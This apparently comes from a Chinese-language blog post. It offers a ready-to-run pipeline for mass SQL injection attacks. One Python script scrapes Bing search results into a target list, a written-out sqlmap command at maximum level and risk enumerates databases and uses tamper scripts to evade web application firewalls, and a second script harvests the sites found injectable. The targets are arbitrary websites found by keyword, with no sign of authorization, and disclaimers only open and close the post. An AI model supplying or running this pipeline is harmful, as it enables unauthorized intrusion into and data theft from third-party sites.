提前声明,仅是技术分享,他人用作危险行为与我无关!!!
sea.py
import requests
from lxml import etree
import time
def create_requests(page, data):
url = f"https://www.bing.com/search?q={data}&first={page}"
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8"
}
try:
response = requests.get(url=url, headers=header, timeout=10)
response.encoding = "utf-8"
print(f"状态码: {response.status_code}")
print(f"当前URL: {url}")
return response.text
except Exception as e:
print(f"请求出错: {e}")
return None
def parse_data(context):
if not context:
return
try:
parse = etree.HTML(context)
# 打印所有可能包含链接的元素,用于调试
print("\n检查页面元素:")
all_links = parse.xpath('//a/@href')
print(f"找到的所有链接数量: {len(all_links)}")
# 使用更通用的xpath表达式
urls = parse.xpath('//li[@class="b_algo"]//h2/a/@href')
if not urls:
print("尝试备用xpath...")
# 尝试其他可能的xpath路径
urls = parse.xpath('//div[@class="b_title"]//a/@href')
if not urls:
print("尝试更多备用xpath...")
urls = parse.xpath('//h2//a/@href')
if urls:
print(f"\n找到 {len(urls)} 个有效URL")
# 打开文件准备写入
with open("urls.txt", "a", encoding='utf-8') as f:
for url in urls:
# URL过滤
if any(skip in url.lower() for skip in [
"bing.com",
".jpg", ".jpeg", ".png", ".pdf",
".gov.cn",
"javascript:",
"microsoft.com",
"/search?",
"go.microsoft.com"
]):
continue
# 写入URL
f.write(url + "\n")
print(f"已写入: {url}")
else:
print("未找到符合条件的URL")
# 保存页面内容用于调试
with open("debug.html", "w", encoding='utf-8') as f:
f.write(context)
print("已将页面内容保存到debug.html文件中")
except Exception as e:
print(f"解析出错: {e}")
def main():
try:
# 清空或创建文件
with open("bing_urls.txt", "w", encoding='utf-8') as f:
f.write("")
data = input("请输入Bing搜索关键词: ")
page_multiple = int(input("请输入爬取页数的倍数: "))
print("----------------------开始抓取----------------------")
for page in range(0, page_multiple * 10, 10):
print(f"\n正在抓取第 {(page//10)+1} 页...")
context = create_requests(page, data)
if context:
parse_data(context)
time.sleep(1)
print("\n----------------------抓取完毕----------------------")
except KeyboardInterrupt:
print("\n程序被用户中断")
except Exception as e:
print(f"程序执行出错: {e}")
if __name__ == '__main__':
main()
ex.py
import os
import shutil
from datetime import datetime
def get_exists(path):
successful_injections = []
print(f"开始分析目录: {path}")
print("="*50)
for root, dirs, files in os.walk(path):
log_path = os.path.join(root, "log")
if os.path.isfile(log_path):
if os.path.getsize(log_path) == 0:
print(f"删除空结果: {root}")
shutil.rmtree(root)
else:
successful_injections.append(root)
print(f"发现注入点: {root}")
# 尝试读取更多信息
try:
with open(log_path, 'r', encoding='utf-8') as f:
first_line = f.readline().strip()
print(f"详细信息: {first_line}")
except Exception as e:
print(f"无法读取详细信息: {e}")
print("-"*30)
return successful_injections
if __name__ == '__main__':
# 获取当前脚本所在目录
current_dir = os.path.dirname(os.path.abspath(__file__))
# 构造results目录的路径
results_dir = os.path.join(current_dir, "results")
print(f"开始时间: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
print("="*50)
# 检查results目录是否存在
if not os.path.exists(results_dir):
print(f"Error: 当前目录下未找到results文件夹")
exit()
try:
successful_points = get_exists(results_dir)
print("\n扫描统计:")
print(f"总共发现: {len(successful_points)} 个注入点")
# 将结果保存到当前目录下的文件
output_file = os.path.join(current_dir, 'injection_results.txt')
with open(output_file, 'w', encoding='utf-8') as f:
f.write(f"扫描时间: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
f.write(f"发现注入点数量: {len(successful_points)}\n\n")
for point in successful_points:
f.write(f"{point}\n")
print(f"\n结果已保存到: {output_file}")
except Exception as e:
print(f"执行出错: {e}")
print("\n完成时间:", datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
顺序就是
1、启动sea脚本,按照提示输入相关信息,将输出一个urls脚本
2、使用sqlmap
sqlmap -m urls.txt --batch --random-agent --level 5 --risk 3 --threads 10 --dbs --output-dir=./results --tamper="space2comment,between"
-
-m urls.txt
: 从urls.txt文件中读取多个目标URL -
--batch
: 自动选择默认选项,不需要用户手动输入 -
--random-agent
: 使用随机User-Agent,避免被封锁 -
--level 5
: 设置测试等级为最高级别5(范围1-5) -
--risk 3
: 设置风险等级为最高级别3(范围1-3) -
--threads 10
: 使用10个线程进行扫描 -
--dbs
: 枚举所有数据库名 -
--tables
: 枚举所有表名 -
--columns
: 枚举所有列名 -
--output-dir=./results 输出结果在当前文件夹
-
--delay=1 # 请求延时
-
--tamper="space2comment,between" # 使用两个tamper脚本来绕过WAF
3、启动ex脚本,将得到sql可注入的点。
再次声明,技术虽好,但合理用之!!!